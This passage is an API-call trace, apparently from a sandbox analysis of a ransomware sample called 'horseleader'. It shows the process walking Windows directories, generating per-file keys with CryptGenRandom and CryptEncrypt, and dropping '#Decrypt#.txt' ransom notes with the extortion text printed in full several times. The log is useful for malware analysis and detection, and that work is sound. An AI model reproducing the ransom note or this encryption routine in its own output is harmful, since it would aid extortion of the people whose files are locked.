@Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.193] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.194] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0234.194] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.194] CloseHandle (hObject=0x158) returned 1 [0234.195] 
GetProcessHeap () returned 0x780000 [0234.195] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.195] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b45ecf9, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x8b45ecf9, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2b0dd120, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0x14de00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="journal.dll", cAlternateFileName="")) returned 1 [0234.195] lstrcmpiW (lpString1="journal.dll", lpString2="Windows") returned -1 [0234.195] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll") returned 66 [0234.195] StrStrIW (lpFirst="journal.dll", lpSrch=".horseleader") returned 0x0 [0234.195] lstrcmpW (lpString1="journal.dll", lpString2="#Decrypt#.txt") returned 1 [0234.195] lstrcmpW (lpString1="journal.dll", lpString2="_uninstalling_.png") returned 1 [0234.195] lstrlenW (lpString=".testttjffg") returned 11 [0234.195] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll", lpSrch=".testttjffg") returned 0x0 [0234.195] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.195] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.196] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\journal.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\journal.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.196] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0234.196] lstrcmpiW (lpString1="ko-KR", lpString2="Windows") returned -1 [0234.196] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR") returned 60 [0234.196] lstrcmpW (lpString1="ko-KR", lpString2=".") returned 1 [0234.196] lstrcmpW (lpString1="ko-KR", lpString2="..") returned 1 [0234.196] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.196] GetProcessHeap () returned 0x780000 [0234.196] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.196] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*") returned 62 [0234.197] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, 
cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.197] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.197] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\.") returned 62 [0234.197] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.197] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7ecb1a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.197] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.197] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\..") returned 63 [0234.198] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.198] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.198] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4e1cef6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe507e4c6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe507e4c6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.198] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.198] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui") returned 76 [0234.198] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.198] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.198] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.198] lstrlenW (lpString=".testttjffg") returned 11 [0234.199] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.199] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.199] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.199] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.199] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4e1cef6, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe507e4c6, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe507e4c6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.199] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.199] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\ink\\ko-KR\\#Decrypt#.txt") returned 74 [0234.200] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ko-KR\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.200] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. 
\r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.200] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.201] lstrlenA (lpString="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") returned 1368 [0234.202] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.202] CloseHandle (hObject=0x158) returned 1 [0234.202] GetProcessHeap () returned 0x780000 [0234.202] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.202] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0234.202] lstrcmpiW (lpString1="lt-LT", lpString2="Windows") returned -1 [0234.202] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT") returned 60 [0234.202] lstrcmpW (lpString1="lt-LT", lpString2=".") returned 1 [0234.203] lstrcmpW (lpString1="lt-LT", lpString2="..") returned 1 [0234.203] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.203] GetProcessHeap () returned 0x780000 [0234.203] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.203] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*") returned 62 [0234.203] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.205] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.205] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\.") returned 62 [0234.205] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.205] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.205] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.205] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\ink\\lt-LT\\..") returned 63 [0234.205] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.205] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.205] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe608f802, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe627e9bb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe62a4b18, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.206] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.206] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui") returned 76 [0234.206] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.206] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.206] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.206] lstrlenW (lpString=".testttjffg") returned 11 [0234.206] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.206] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.206] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.206] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\lt-lt\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.207] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe608f802, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe627e9bb, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe62a4b18, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.207] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.207] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\#Decrypt#.txt") returned 74 [0234.207] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lt-LT\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\lt-lt\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.209] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.209] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.210] lstrlenA (lpString="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") returned 1368 [0234.210] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.210] CloseHandle (hObject=0x158) returned 1 [0234.210] GetProcessHeap () returned 0x780000 [0234.210] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.210] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="lv-LV", cAlternateFileName="")) returned 1 [0234.210] lstrcmpiW (lpString1="lv-LV", lpString2="Windows") returned -1 [0234.210] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV") returned 60 [0234.211] lstrcmpW (lpString1="lv-LV", lpString2=".") returned 1 [0234.211] lstrcmpW (lpString1="lv-LV", lpString2="..") returned 1 [0234.211] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.211] GetProcessHeap () returned 0x780000 [0234.211] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0234.211] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*") returned 62 [0234.211] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.212] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.212] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\.") returned 62 [0234.212] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.212] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd812c74, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd812c74, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd812c74, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.212] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.212] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\lv-LV\\..") returned 63 [0234.212] lstrcmpW (lpString1="..", 